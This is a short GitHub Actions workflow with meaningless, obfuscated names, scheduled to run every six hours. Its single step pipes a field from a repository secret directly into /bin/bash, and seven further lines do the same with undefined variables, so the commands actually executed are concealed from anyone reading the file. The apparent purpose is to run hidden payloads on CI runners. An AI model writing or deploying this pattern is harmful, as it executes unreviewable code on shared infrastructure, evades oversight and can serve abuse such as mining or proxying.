name: taxintg

on:
  workflow_dispatch:
  schedule:
    - cron: '53 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taxintg
        env:
          vfesx4: ${{ secrets.vfesx4 }}
        run: |
          echo $vfesx4 | jq -r .tkbu6 | /bin/bash
          echo $iamg7 | jq -r .b6679 | /bin/bash
          echo $uyhj3 | jq -r .wejx459 | /bin/bash
          echo $fbdtf23482 | jq -r .qrj254 | /bin/bash
          echo $u10221 | jq -r .yempa69 | /bin/bash
          echo $buj25595 | jq -r .w0856 | /bin/bash
          echo $nkyn82975 | jq -r .bwl8 | /bin/bash
          echo $sbp25 | jq -r .s2 | /bin/bash

